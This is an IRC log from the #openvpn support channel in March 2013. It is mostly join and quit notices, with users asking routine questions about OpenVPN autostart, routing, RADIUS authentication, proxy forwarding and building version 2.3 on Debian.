[~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 15:25 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 15:25 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 15:54 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 15:56 < Visitorerer> My friend and I are connected through Tunnelblick, but we can't ping eachother. Config/logs here : http://pastebin.com/7rvRbivz 15:57 < Visitorerer> We can see each other's iTune library though 15:57 < Visitorerer> iTunes* 15:57 -!- p3rror [~mezgani@41.249.31.8] has quit [Ping timeout: 245 seconds] 15:57 -!- p3rror [~mezgani@41.248.120.12] has joined #openvpn 16:00 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 16:11 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has joined #openvpn 16:12 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 258 seconds] 16:31 -!- p3rror [~mezgani@41.248.120.12] has quit [Ping timeout: 246 seconds] 16:32 -!- dazo_afk is now known as dazo 16:44 < Nemus> !config 16:44 <@vpnHelper> (config []) -- If is given, sets the value of to . Otherwise, returns the current value of . You may omit the leading "supybot." in the name if you so choose. 16:45 -!- p3rror [~mezgani@41.249.93.19] has joined #openvpn 16:46 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 256 seconds] 16:52 -!- JesseC [~JesseCWor@wsip-98-175-20-126.br.br.cox.net] has joined #openvpn 16:54 -!- mezgani [~mezgani@41.248.208.152] has joined #openvpn 16:56 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has joined #openvpn 16:56 -!- p3rror [~mezgani@41.249.93.19] has quit [Ping timeout: 245 seconds] 17:01 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has left #openvpn [] 17:04 -!- JSharpe [~JSharpe@5.63.146.148] has joined #openvpn 17:17 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 17:17 < hrenovo> greetings. how can i configure openvpn to auto start with windows 17:18 < hrenovo> openvpn gui 17:19 < Valcorb> hrenovo: put a shortcut of openvpn-gui.exe (located in C:/Program Files/OpenVPN/bin) in %Appdata%/Roaming/Microsoft/Windows/Start Menu/Startup 17:20 -!- p3rror [~mezgani@41.249.18.144] has joined #openvpn 17:21 -!- mezgani [~mezgani@41.248.208.152] has quit [Ping timeout: 256 seconds] 17:24 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 17:24 < hrenovo> Valcorb: thanks 17:24 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Read error: Connection reset by peer] 17:24 -!- p3rror [~mezgani@41.249.18.144] has quit [Max SendQ exceeded] 17:24 < Valcorb> np 17:25 -!- p3rror [~mezgani@41.249.18.144] has joined #openvpn 17:29 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Quit: I shouldn't have left....] 17:30 < rob0> !pki 17:30 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Heres a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that eachother were signed by the right ca.key. Optionally, the client also checks that the server cert was 17:30 <@vpnHelper> signed specially as a server (see !servercert) 17:31 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 17:31 -!- mode/#openvpn [+o raidz] by ChanServ 17:33 -!- mezgani [~mezgani@41.249.94.157] has joined #openvpn 17:35 -!- p3rror [~mezgani@41.249.18.144] has quit [Ping timeout: 245 seconds] 18:00 -!- _pll [~meru@181.64.90.111] has joined #openvpn 18:01 < _pll> Hello, I'm having a routing issue, I would like to specify the device it's used when pushing a route to the client. 18:02 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 18:02 < _pll> I would like for the client to have "192.168.1.3 via 192.168.1.2 dev tap0" 18:03 < _pll> but when I use the push "route 192.168.1.3 255.255.255.255" the result is 192.168.1.3 via 192.168.1.2 dev eth0 18:03 < _pll> Is there a way to do that or do I have to give each client a .bat file? 18:04 < _pll> I'm using bridged tap. 18:21 -!- phantomcircuit [~phantomci@covertinferno.org] has quit [Max SendQ exceeded] 18:21 -!- phantomcircuit [~phantomci@covertinferno.org] has joined #openvpn 18:23 -!- mezgani [~mezgani@41.249.94.157] has quit [Quit: Leaving] 18:24 -!- _pll [~meru@181.64.90.111] has quit [Quit: Konversation terminated!] 18:24 -!- marksaitis [~marksaiti@02d9d2c7.bb.sky.com] has joined #openvpn 18:35 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 18:44 -!- Nemus [~Nemus@unaffiliated/nemus] has left #openvpn [] 18:45 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 246 seconds] 18:48 -!- dazo is now known as dazo_afk 18:52 -!- JSharpe [~JSharpe@5.63.146.148] has quit [Quit: Leaving] 19:05 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 19:07 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 19:13 -!- raidz is now known as raidz_away 19:18 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 19:21 -!- dzubey [~dzubey@68.14.254.195] has quit [Quit: Leaving.] 19:24 -!- p3rror [~mezgani@41.250.232.91] has joined #openvpn 19:26 -!- dkorzhevin [~dkorzhevi@tiger.mirohost.net] has joined #openvpn 19:28 < dkorzhevin> Guys, can you please advice what can i use to connect OpenVPN to FreeRADIUS? 19:28 < dkorzhevin> Should i use openvpn-auth-pam or radiusplugin? 19:29 < dkorzhevin> I have remote freeradius server, which already used as auth server for ipsec,l2tp,pptp.. and now i want use it with openvpn 19:30 < dkorzhevin> I try to use howto on page: http://www.vpsdash.com/?p=163 but something doesn't work 19:30 <@vpnHelper> Title: Easy Setup of Openvpn on Debian to use Radius authentication. « vpsdash (at www.vpsdash.com) 19:30 < dkorzhevin> I write forum post with full logs at official forum https://forums.openvpn.net/post28526.html#p28526 19:30 <@vpnHelper> Title: OpenVPN Support Forum OpenVPN with freeradius authentication : Configuration (at forums.openvpn.net) 19:31 < dkorzhevin> Maby, openvpn-auth-pam is better solution? 19:31 < dkorzhevin> Please advice 20:07 -!- mezgani [~mezgani@41.140.32.181] has joined #openvpn 20:10 -!- p3rror [~mezgani@41.250.232.91] has quit [Ping timeout: 255 seconds] 20:14 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-gfejrjxrugpiqdyx] has quit [Ping timeout: 240 seconds] 20:16 -!- p3rror [~mezgani@41.249.22.161] has joined #openvpn 20:17 -!- mezgani [~mezgani@41.140.32.181] has quit [Ping timeout: 245 seconds] 20:20 -!- mezgani [~mezgani@41.140.159.147] has joined #openvpn 20:22 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-lmbdyojognqqrrqo] has joined #openvpn 20:22 -!- p3rror [~mezgani@41.249.22.161] has quit [Ping timeout: 252 seconds] 20:30 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has quit [Changing host] 20:30 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 20:33 -!- mezgani [~mezgani@41.140.159.147] has quit [Ping timeout: 245 seconds] 20:34 -!- mezgani [~mezgani@41.249.9.73] has joined #openvpn 20:34 -!- mezgani [~mezgani@41.249.9.73] has quit [Read error: Connection reset by peer] 20:36 -!- p3rror [~mezgani@41.249.9.73] has joined #openvpn 20:59 -!- mezgani [~mezgani@41.140.0.118] has joined #openvpn 21:01 -!- p3rror [~mezgani@41.249.9.73] has quit [Ping timeout: 245 seconds] 21:03 -!- mezgani [~mezgani@41.140.0.118] has quit [Ping timeout: 245 seconds] 21:04 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 21:05 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Client Quit] 21:06 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 21:06 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Client Quit] 21:07 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 21:13 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 21:14 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 21:23 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 21:24 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 21:33 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 21:34 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 21:35 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Client Quit] 21:35 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 21:43 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 21:50 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 21:52 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 22:08 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 240 seconds] 22:12 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 22:38 -!- marksaitis [~marksaiti@02d9d2c7.bb.sky.com] has quit [Read error: Connection reset by peer] 22:40 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 22:41 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 22:57 -!- bkrieg1337 [~bkrieg133@li515-89.members.linode.com] has joined #openvpn 23:14 -!- bkrieg1337 [~bkrieg133@li515-89.members.linode.com] has quit [Quit: Leaving] 23:16 -!- cap_sensitive [~cap_sensi@unaffiliated/cap-sensitive/x-1266900] has joined #openvpn 23:16 < cap_sensitive> Hi. Can I redirect all openvpn data to an external proxy? 23:17 < cap_sensitive> in the server side 23:41 <@ecrist> what do you mean 23:44 < cap_sensitive> ecrist: So once I connect to the VPN, I can access the Internet via the proxy (indirectly) 23:49 < rob0> A VPN, when connected, gives you an IP address (and a route across the VPN using that address.) What you do with it, or don't do with it, is up to you. 23:50 <@ecrist> cap_sensitive: if you control the server, you can do whatever you want with the VPN 23:50 <@ecrist> !goal 23:50 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 23:58 < cap_sensitive> ecrist: Can you give me a direction (such as reading certain manual?), Can I achieve it via iptables purely (forward all packets to certain external proxy)? --- Day changed Sat Mar 16 2013 00:00 <@ecrist> you can do that. 00:00 <@ecrist> you can do a redirect, forcing ALL VPN traffic over the VPN 00:00 <@ecrist> that's what I usually do 00:04 < cap_sensitive> ecrist: I have done that. The problem is that the VPN server has its own 'public' IP addr, and I want to forward all packet to another server that also has 'public' domain. 00:04 < cap_sensitive> Currently all traffic are through the VPN directly, 00:05 < cap_sensitive> but now I want all the traffic that through VPN then through the external proxy. 00:12 < cap_sensitive> Maybe I can forward all packets to that proxy, but that proxy requires auth. 00:13 < cap_sensitive> though I should be able to running a local python http proxy to handle the auth at server side, but I like to avoid that, if possible. 00:14 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn 00:14 < cap_sensitive> !goal I would like to make all trafic that through the VPN then through another external proxy which required authentication 00:16 -!- diffen3 [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 00:17 <@ecrist> !notovpn 00:17 <@vpnHelper> "notovpn" is "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem 00:17 -!- erry [erry@freenode/staff/erry] has quit [Ping timeout: 608 seconds] 00:19 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Ping timeout: 245 seconds] 00:21 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 00:23 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 00:43 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 00:45 <@plaisthos> kisom: application/x-openvpn-profile 00:45 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Remote host closed the connection] 00:46 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 00:52 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 00:52 -!- Visitorerer [~Visitorer@64.111.86.226] has quit [Ping timeout: 245 seconds] 00:53 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 00:53 -!- mode/#openvpn [+o plaisthos] by ChanServ 00:54 < soapee01> Frack krzee. I love that crazy bastard. Where in this moment in time is he in this moment in the world? 00:54 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 00:55 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 01:06 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 01:14 -!- pcdummy_ is now known as pcdummy 01:15 -!- pcdummy [~quassel@mx1.page4me.ch] has quit [Changing host] 01:15 -!- pcdummy [~quassel@unaffiliated/pcdummy] has joined #openvpn 01:24 -!- cap_sensitive [~cap_sensi@unaffiliated/cap-sensitive/x-1266900] has quit [Quit: leaving] 01:25 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 01:32 -!- pcdummy [~quassel@unaffiliated/pcdummy] has quit [Ping timeout: 248 seconds] 01:34 -!- pcdummy [~quassel@unaffiliated/pcdummy] has joined #openvpn 01:38 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 01:39 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 02:23 -!- brute11k [~brute@89.249.235.53] has joined #openvpn 02:35 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 245 seconds] 02:49 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 02:54 -!- dkorzhevin [~dkorzhevi@tiger.mirohost.net] has quit [Quit: WeeChat 0.4.0] 02:59 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 03:00 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 03:04 -!- xbanux [~xbanux@triband-mum-59.182.171.64.mtnl.net.in] has joined #openvpn 03:27 < jzaw> whats the best / easiest way to get 2.3.x on debian wheezy 03:27 < jzaw> compile from git? 03:27 < jzaw> or use the tarball gz 03:27 < jzaw> is it recommended? 03:28 < ngharo> my buddy made a package 03:28 < ngharo> http://dc414.org/~uberushaximus/openvpn_2.3.0_i386.deb 03:29 < ngharo> compiling from sauce is just fine too 03:29 < jzaw> my reason for wanting 2.3.x is for its (maybe) superior ipv6 support ? 03:30 < jzaw> will dpkg -i that deb also pull any deps from whezzy repo? 03:30 < ngharo> i've been seeing new ipv6 patches land in git 03:30 < ngharo> i'd pull from git if you want at the latest stuff 03:30 < jzaw> which branch ? 03:31 < jzaw> i think id like to do that 03:32 < ngharo> !git 03:32 <@vpnHelper> "git" is (#1) For the stable git tree: git clone git://openvpn.git.sourceforge.net/gitroot/openvpn/openvpn.git or (#2) For the development git tree: git clone git://openvpn.git.sourceforge.net/gitroot/openvpn/openvpn-testing.git or (#3) Browse the git repositories here: http://openvpn.git.sourceforge.net/git/gitweb-index.cgi or (#4) See !git-doc how to use git 03:32 < ngharo> ok by "some" i meant "one" :) 03:34 < jzaw> hehe 03:34 < ngharo> ipv6 works fine though, go for it 03:34 < jzaw> ok so the whole reconf command as per INSTALL for repo compile? 03:35 < jzaw> when i look at the --version on wheezy it shows me the ./configure options used to compile that one 03:35 < jzaw> should i use the same? 03:35 < jzaw> or just bare ./configure? 03:36 < ngharo> i use the iproute2 enable flag per pekster's recommendation 03:36 < ngharo> thats all i set when compiling personally 03:40 < jzaw> http://sprunge.us/AjjT 03:40 < jzaw> thats what is set in the wheezy deb 03:41 < jzaw> ./configure --enable-iproute2 03:41 < jzaw> ngharo, ^^ ? 03:41 < jzaw> nowt else? 03:41 < jzaw> k trying now 03:42 < ngharo> ya debian packaging tools does some crazy business 03:42 < ngharo> hence that configure string 04:03 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 04:13 < jzaw> ngharo, heres a question re ipv6 04:13 < jzaw> non tunneled i can reach my home lan via ipv4 or ipv6 04:13 < jzaw> i can ssh in via either / both 04:14 < jzaw> and when i admin the network it has been known form me to kill my ipv4 cos of some silly typo in network/interfaces 04:14 < jzaw> but since i can get in via ipv6 ... just fix ipv4 and its up and running again 04:15 < jzaw> can one have two ovpn tunnels on on ipv4 and one on ipv6 ? 04:15 < jzaw> so ill always have a secure tun if i break one 04:22 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has joined #openvpn 04:25 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has left #openvpn [] 04:35 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 04:38 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 04:42 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 04:44 -!- newbie|4 [~tjz@bb219-74-189-54.singnet.com.sg] has joined #openvpn 04:46 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 252 seconds] 04:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 05:07 -!- erry_ is now known as erry 05:51 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 06:12 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 256 seconds] 06:20 -!- JSharpe [~JSharpe@web.sinexdigitalrecovery.com] has joined #openvpn 06:20 -!- master_o1_master [~master_of@p4FF24889.dip.t-dialin.net] has joined #openvpn 06:24 -!- master_of_master [~master_of@p4FF24CC9.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 06:25 -!- catsup [~d@64.111.123.163] has joined #openvpn 06:31 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 06:31 -!- catsup [~d@64.111.123.163] has joined #openvpn 06:42 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 06:50 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Read error: Connection reset by peer] 06:53 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 06:56 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 06:56 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has joined #openvpn 07:10 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 246 seconds] 07:18 < Dennis84> hi 07:20 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 07:23 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 07:31 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 07:34 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 07:54 -!- dekroning [~dekroning@vps3.cttinnovations.net] has quit [Ping timeout: 276 seconds] 07:59 -!- mcp [~mcp@wolk-project.de] has quit [Excess Flood] 08:00 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 08:06 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 08:09 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 08:11 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 08:22 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 08:51 -!- meskarune [~meskarune@maharani.meskarune.com] has joined #openvpn 08:52 < meskarune> Hey, I have a question about install OpenVPN access server on a Linode. Getting this error: Error: iptables service not started because of error (SVC_RUN_EXCEPT) 08:52 < meskarune> Linode is a XEN VPS host 08:52 < meskarune> I've been web searching and can't find much on that error message. how could I go about diagnosing this further? 09:03 <@EugeneKay> !notopenvpn 09:03 <@vpnHelper> "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem 09:04 <@EugeneKay> Also, what weird init script/distro are you using for iptables that gives that? 09:05 <@EugeneKay> Ah I see; it's an AS error 09:05 <@EugeneKay> !as 09:05 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 09:06 <@EugeneKay> I can tell you that vanilla openvpn works just fine on Linodes 09:10 < Martin`> What is de diference between openvpn and as? 09:11 < Martin`> just an ui for openvpn or more? 09:11 <@EugeneKay> AS is a commercial product by OpenVPN Technologies 09:11 < Martin`> ok 09:11 * Martin` likes the vanilla one :P 09:11 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has quit [Ping timeout: 248 seconds] 09:11 < Martin`> I only have a strange problem, when I start a youtube movie on my laptop (or other movie in browser) openvpn reconnects :/ 09:12 < Martin`> using tunnelblick on mac osx 09:12 <@EugeneKay> That's an intereesting one. 09:13 < Martin`> I known, not sure what can be the problem 09:13 <@EugeneKay> Me neither. 09:21 -!- xbanux [~xbanux@triband-mum-59.182.171.64.mtnl.net.in] has quit [Read error: Connection reset by peer] 09:21 -!- xbanux [~xbanux@triband-mum-59.182.152.115.mtnl.net.in] has joined #openvpn 09:23 < meskarune> thanks EugeneKay :) 09:25 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 09:27 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 09:33 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 09:37 -!- HyperGlide [~HyperGlid@125.69.7.147] has joined #openvpn 09:47 -!- master_of_master [~master_of@p4FF249F3.dip.t-dialin.net] has joined #openvpn 09:49 -!- master_o1_master [~master_of@p4FF24889.dip.t-dialin.net] has quit [Ping timeout: 248 seconds] 10:15 -!- diffen3 [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Ping timeout: 245 seconds] 10:32 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:41 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 10:48 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 10:54 -!- brute11k [~brute@89.249.235.53] has quit [Ping timeout: 264 seconds] 10:57 -!- brute11k [~brute@89.249.235.53] has joined #openvpn 10:57 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 10:57 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 272 seconds] 11:05 -!- novaflash is now known as novaflash_away 11:10 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 11:11 -!- novaflash_away is now known as novaflash 11:23 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 11:26 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 11:26 -!- mode/#openvpn [+v s7r] by ChanServ 11:32 -!- riot [~riot@eris.hackerfleet.org] has quit [Ping timeout: 260 seconds] 11:38 -!- riot [~riot@eris.hackerfleet.org] has joined #openvpn 11:56 -!- hatschi [~marvin@dslb-188-098-223-091.pools.arcor-ip.net] has joined #openvpn 12:35 -!- brute11k [~brute@89.249.235.53] has quit [Ping timeout: 255 seconds] 12:35 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 12:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 12:37 -!- brute11k [~brute@89.249.235.53] has joined #openvpn 12:51 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 245 seconds] 13:00 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 260 seconds] 13:01 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn 13:09 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 13:10 -!- master_o1_master [~master_of@p4FF24414.dip.t-dialin.net] has joined #openvpn 13:12 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 13:13 -!- master_of_master [~master_of@p4FF249F3.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 13:17 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 13:18 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 13:22 -!- hatschi [~marvin@dslb-188-098-223-091.pools.arcor-ip.net] has quit [Quit: hatschi] 13:23 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 245 seconds] 13:30 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 13:31 -!- raidz_away [~raidz@46.28.203.186] has joined #openvpn 13:31 -!- kubbing [~kubbing@89.177.146.18] has quit [Read error: Connection reset by peer] 13:32 -!- raidz_away is now known as raidz 13:32 -!- raidz [~raidz@46.28.203.186] has quit [Changing host] 13:32 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 13:32 -!- mode/#openvpn [+o raidz] by ChanServ 13:32 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 13:33 -!- master_of_master [~master_of@p4FF24E5B.dip.t-dialin.net] has joined #openvpn 13:36 -!- master_o1_master [~master_of@p4FF24414.dip.t-dialin.net] has quit [Ping timeout: 256 seconds] 13:43 -!- Sidze- [~Sid@ppp-seco11pa2-46-193-129.71.wb.wifirst.net] has joined #openvpn 13:46 < Sidze-> hi all, I have an issue with openvpn with Xubuntu 12.10 as client and Proxmox VE 2.3 as server. My server configuration seems to be works and my client configuration too. I can connect to the server but I cann't going outside. I think I have an routing issue, anyone can say me if there is issue with route : http://paste.debian.net/242150/ 13:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 13:56 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 13:58 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 14:01 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Read error: Operation timed out] 14:06 -!- meskarune [~meskarune@maharani.meskarune.com] has left #openvpn ["WeeChat 0.4.0"] 14:08 -!- xbanux [~xbanux@triband-mum-59.182.152.115.mtnl.net.in] has quit [Ping timeout: 260 seconds] 14:12 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has joined #openvpn 14:28 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 14:37 -!- nonotza_ [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn 14:37 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Ping timeout: 245 seconds] 14:37 -!- nonotza_ is now known as nonotza 14:39 -!- Sidze- [~Sid@ppp-seco11pa2-46-193-129.71.wb.wifirst.net] has quit [Read error: Operation timed out] 14:42 -!- Sidze- [~Sid@ppp-seco11pa2-46-193-129.71.wb.wifirst.net] has joined #openvpn 14:51 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds] 14:57 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 15:11 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 264 seconds] 15:11 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 15:14 -!- Sidze- [~Sid@ppp-seco11pa2-46-193-129.71.wb.wifirst.net] has quit [Read error: Connection reset by peer] 15:28 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Quit: nonotza] 15:28 -!- master_of_master [~master_of@p4FF24E5B.dip.t-dialin.net] has quit [Read error: Operation timed out] 15:32 -!- master_of_master [~master_of@p4FF2495D.dip.t-dialin.net] has joined #openvpn 15:47 -!- brute11k [~brute@89.249.235.53] has quit [Quit: Leaving.] 15:57 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 276 seconds] 15:58 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 16:14 -!- m0r0n|3 [~kvirc@dsl-67-55-0-106.acanac.net] has joined #openvpn 16:14 < m0r0n|3> Hello 16:15 < m0r0n|3> My isp is hosting a vpn for me and when I connect to it using the same login info one of my computers gets disconnected. How do I connect two computers to the VPN? 16:40 < 